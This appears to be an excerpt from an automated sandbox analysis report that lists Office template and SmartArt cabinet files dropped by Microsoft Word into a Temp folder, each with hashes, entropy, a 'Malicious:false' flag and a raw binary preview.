                                                                                                                                              Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6819.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21791
                                                                                                                                              Entropy (8bit):7.65837691872985
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                                              MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                                              SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                                              SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                                              SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab682C.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21357
                                                                                                                                              Entropy (8bit):7.641082043198371
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                                              MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                                              SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                                              SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                                              SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab682D.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20457
                                                                                                                                              Entropy (8bit):7.612540359660869
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                                              MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                                              SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                                              SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                                              SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab683D.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):22340
                                                                                                                                              Entropy (8bit):7.668619892503165
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                                              MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                                              SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                                              SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                                              SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab683E.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):34816
                                                                                                                                              Entropy (8bit):7.840826397575377
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                                              MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                                              SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                                              SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                                              SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab683F.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):22594
                                                                                                                                              Entropy (8bit):7.674816892242868
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                                              MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                                              SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                                              SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                                              SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6840.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):23597
                                                                                                                                              Entropy (8bit):7.692965575678876
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                                              MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                                              SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                                              SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                                              SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6841.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):31835
                                                                                                                                              Entropy (8bit):7.81952379746457
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                                              MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                                              SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                                              SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                                              SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6842.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):35519
                                                                                                                                              Entropy (8bit):7.846686335981972
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                                              MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                                              SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                                              SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                                              SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6894.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):43653
                                                                                                                                              Entropy (8bit):7.899157106666598
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                                                                              MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                                                                              SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                                                                              SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                                                                              SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab68B6.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):46413
                                                                                                                                              Entropy (8bit):7.9071408623961394
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                                                                              MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                                                                              SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                                                                              SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                                                                              SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab697E.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):42788
                                                                                                                                              Entropy (8bit):7.89307894056
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                                                                              MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                                                                              SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                                                                              SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                                                                              SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                                                                              Malicious:false
